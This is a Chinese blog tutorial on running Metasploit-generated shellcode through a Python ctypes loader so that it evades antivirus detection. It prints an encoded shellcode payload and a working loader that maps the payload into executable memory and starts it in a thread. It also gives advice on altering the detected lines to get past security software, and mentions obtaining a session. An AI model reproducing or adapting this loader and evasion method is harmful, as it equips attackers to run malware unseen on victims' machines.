首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
详解Python中的array数组模块相关使用
Jul 05 Python
python实现逻辑回归的方法示例
May 02 Python
Python中常见的异常总结
Feb 20 Python
详解python实现线程安全的单例模式
Mar 05 Python
selenium+python实现自动登录脚本
Apr 22 Python
详解windows python3.7安装numpy问题的解决方法
Aug 13 Python
Python 实现王者荣耀中的敏感词过滤示例
Jan 21 Python
Laravel+Dingo/Api 自定义响应的实现
Feb 17 Python
Python3安装Pillow与PIL的方法
Apr 03 Python
对python中 math模块下 atan 和 atan2的区别详解
Jan 17 Python
Python如何操作docker redis过程解析
Aug 10 Python
解决python绘图使用subplots出现标题重叠的问题
Apr 30 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
直流胆(1) 台湾(1) S2000(3) MX500(1) YB400(2) 森海(1) PL660(1) YB235(1) SRF-S83(1) 南麂列岛(1)
You might like
PHP个人网站架设连环讲(四)
2006/10/09 PHP
用PHP函数解决SQL injection
2006/12/09 PHP
php 伪造本地文件包含漏洞的代码
2011/11/03 PHP
PHP输出当前进程所有变量/常量/模块/函数/类的示例
2013/11/07 PHP
php检测iis环境是否支持htaccess的方法
2014/02/18 PHP
Zend Framework教程之Application用法实例详解
2016/03/14 PHP
LINUX下PHP程序实现WORD文件转化为PDF文件的方法
2016/05/13 PHP
php实现在线通讯录功能(附源码)
2016/05/13 PHP
php mysql procedure实现获取多个结果集的方法【基于thinkPHP】
2016/11/09 PHP
thinkPHP5.0框架独立配置与动态配置方法
2017/03/17 PHP
PHPExcel实现表格导出功能示例【带有多个工作sheet】
2018/06/13 PHP
javascript URL编码和解码使用说明
2010/04/12 Javascript
js获取字符串最后一位方法汇总
2014/11/13 Javascript
Javascript中的apply()方法浅析
2015/03/15 Javascript
使用jQuery实现更改默认alert框体
2015/04/13 Javascript
javascript 判断两个日期之差的示例代码
2015/09/05 Javascript
JS使用post提交的两种方式
2015/12/03 Javascript
Javascript将双字节字符转换成单字节字符并计算长度
2016/06/22 Javascript
vue实现移动端省市区选择
2019/09/27 Javascript
Vue3项目打包后部署到服务器 请求不到后台接口解决方法
2020/02/06 Javascript
vue实现页面切换滑动效果
2020/06/29 Javascript
[06:48]DOTA2-DPC中国联赛2月26日Recap集锦
2021/03/11 DOTA
浅谈Pandas中map, applymap and apply的区别
2018/04/10 Python
Python使用pandas和xlsxwriter读写xlsx文件的方法示例
2019/04/09 Python
机器学习实战之knn算法pandas
2019/06/22 Python
python基于paramiko将文件上传到服务器代码实现
2019/07/08 Python
python爬虫请求头的使用
2020/12/01 Python
Python基础进阶之海量表情包多线程爬虫功能的实现
2020/12/17 Python
django项目中使用云片网发送短信验证码的实现
2021/01/19 Python
python+opencv3.4.0 实现HOG+SVM行人检测的示例代码
2021/01/28 Python
HTML5中的autofocus(自动聚焦)属性介绍
2014/04/23 HTML / CSS
KIEHL’S科颜氏官方旗舰店:源自美国的顶级护肤品牌
2018/06/07 全球购物
护士毕业自我鉴定
2014/02/07 职场文书
《最后的姿势》教学反思
2014/02/27 职场文书
活动总结怎么写
2014/04/28 职场文书
民间借贷纠纷答辩状
2015/08/03 职场文书